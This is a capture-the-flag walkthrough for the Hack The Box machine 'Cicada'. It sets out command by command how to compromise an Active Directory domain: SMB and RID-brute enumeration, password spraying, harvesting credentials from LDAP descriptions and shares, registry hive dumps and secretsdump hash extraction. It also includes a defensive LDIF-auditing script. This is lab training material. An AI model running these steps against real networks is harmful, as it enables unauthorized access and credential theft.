HTB-CICADA

A good machine for practising the basic steps of enumeration and for understanding misconfigurations in common Windows services.

Released on 28 Sep 2024. Created by theblxckcicada.

Enumeration - NMAP Portscan

nmap -p- -sV <IP>

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-18 02:28:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration - SMB

smbclient -L //<IP>

We will find that the HR share can be accessed without any further permissions.

smbclient //<IP>/HR -N -m SMB2

The share contains a .txt file with useful content.

Now that we have captured a password the easy way, we need some usernames to try it with.

Enumeration - RID-Brute Force

crackmapexec smb <IP> -u guest -p '' --rid-brute

Password spraying the harvested usernames will show that "michael.wrightson" accepts the password and can be used to enumerate further.

Enumeration - LDAP

ldapsearch -x -H ldap://<IP> -D "Cicada\\michael.wrightson" -w '<password>' -b "DC=cicada,DC=htb" "(objectClass=user)"

In the LDAP results we will find the account of David Orelious, who put his password in the description attribute.
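As an added example, not part of the original writeup, the check below is a defender-side audit of the same finding: it parses saved ldapsearch LDIF output and flags user descriptions that look like they hold a credential, so they can be cleaned up. The sample entries, account names and values are constructed.

```python
import base64
import re

# Constructed sample in ldapsearch LDIF style; every name and value here is made up.
SAMPLE_LDIF = """\
dn: CN=Alice Example,CN=Users,DC=example,DC=local
sAMAccountName: alice.example
description: Helpdesk team lead

dn: CN=Bob Example,CN=Users,DC=example,DC=local
sAMAccountName: bob.example
description: Just in case I forget, my password is
  Summer2024!

dn: CN=Svc Backup,CN=Users,DC=example,DC=local
sAMAccountName: svc_backup
description:: cHdkOiBCYWNrdXBAMTIz
"""

# Phrases that commonly precede a credential dropped into a free-text attribute.
CRED_PATTERN = re.compile(r"\b(password|passwd|pwd|pass)\b\s*(is|[:=])", re.IGNORECASE)

def parse_ldif(text):
    """Parse LDIF into a list of dicts; unfolds continuation lines and decodes '::' base64 values."""
    entries, current, lines = [], {}, []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:  # folded continuation of the previous line
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    for line in lines + [""]:  # trailing "" flushes the last entry
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")
        if value.startswith(":"):  # "attr:: <base64>" form
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        current.setdefault(key.strip(), []).append(value.strip())
    return entries

def find_credential_descriptions(text):
    """Return (sAMAccountName, description) pairs whose description looks like it holds a credential."""
    hits = []
    for entry in parse_ldif(text):
        for desc in entry.get("description", []):
            if CRED_PATTERN.search(desc):
                hits.append((entry.get("sAMAccountName", ["?"])[0], desc))
    return hits
```

Run it over the saved output of the ldapsearch query above (user objects only) and review each hit; a hit means the description should be cleared and the account's password rotated.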

Enumeration - RPC

rpcclient -U 'CICADA.htb\michael.wrightson' <IP>

enumdomusers

enumdomgroups

Enumeration - SMB Part II

crackmapexec smb <IP> -u david.orelious -p '<Password>' --shares

crackmapexec smb <IP> -u david.orelious -p '<password>' --groups

We should take a look inside the newly accessible shares, and keep in mind that there are some interesting permissions in play.

smbclient //<IP>/dev -U CICADA\\david.orelious

Here we will find hardcoded credentials for emily.

User FLAG

smbclient //<IP>/C$ -U CICADA\\emily.oscars

Privilege Escalation

evil-winrm -i <IP> -u emily.oscars -p '<password>'

whoami /all

reg save hklm\sam c:\temp\sam

reg save hklm\system c:\temp\system

download sam

download system

Use the tool of your choice to dump the secrets now. In my case I used the "impacket" toolset.

secretsdump.py -sam sam -system system LOCAL

Root FLAG

Afterwards, just connect to the target machine via WinRM and obtain the root.txt flag.